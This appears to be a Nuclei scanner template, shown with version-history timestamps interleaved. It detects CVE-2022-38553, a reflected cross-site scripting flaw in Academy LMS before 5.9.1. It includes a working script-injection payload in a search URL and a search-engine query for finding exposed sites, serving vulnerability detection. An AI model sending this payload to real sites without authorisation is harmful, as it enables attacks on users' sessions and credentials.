2022-09-29 17:21:28 +00:00
id : CVE-2022-38553
info :
2022-10-19 21:11:27 +00:00
name : Academy Learning Management System <5.9.1 - Cross-Site Scripting
2022-09-29 17:21:28 +00:00
author : edoardottt
severity : medium
description : |
2022-10-19 21:11:27 +00:00
Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-09-29 17:21:28 +00:00
reference :
- https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
- https://github.com/4websecurity/CVE-2022-38553
2022-10-01 08:54:02 +00:00
- https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
2022-09-29 17:21:28 +00:00
classification :
2022-10-01 08:54:02 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-29 17:21:28 +00:00
cve-id : CVE-2022-38553
2022-10-01 08:54:02 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:*
epss-score : 0.00098
2022-09-29 17:21:28 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-09-29 17:21:28 +00:00
google-query : intext:"Study any topic, anytime"
2023-06-04 08:13:42 +00:00
verified : true
2022-09-29 17:49:28 +00:00
tags : cve,cve2022,academylms,xss
2022-09-29 17:21:28 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-29 17:21:28 +00:00
- method : GET
path :
2022-09-29 17:49:28 +00:00
- '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
2022-09-29 17:21:28 +00:00
matchers-condition : and
matchers :
- type : word
2022-09-29 17:49:28 +00:00
part : body
2022-09-29 17:21:28 +00:00
words :
2022-09-29 17:49:28 +00:00
- '"><script>alert(document.domain)</script>'
- 'Study any topic'
condition : and
2022-09-29 17:21:28 +00:00
- type : word
2022-09-29 17:49:28 +00:00
part : header
2022-09-29 17:21:28 +00:00
words :
2022-09-29 17:49:28 +00:00
- 'text/html'
- type : status
status :
- 200
2022-10-19 21:11:27 +00:00
# Enhanced by md on 2022/10/18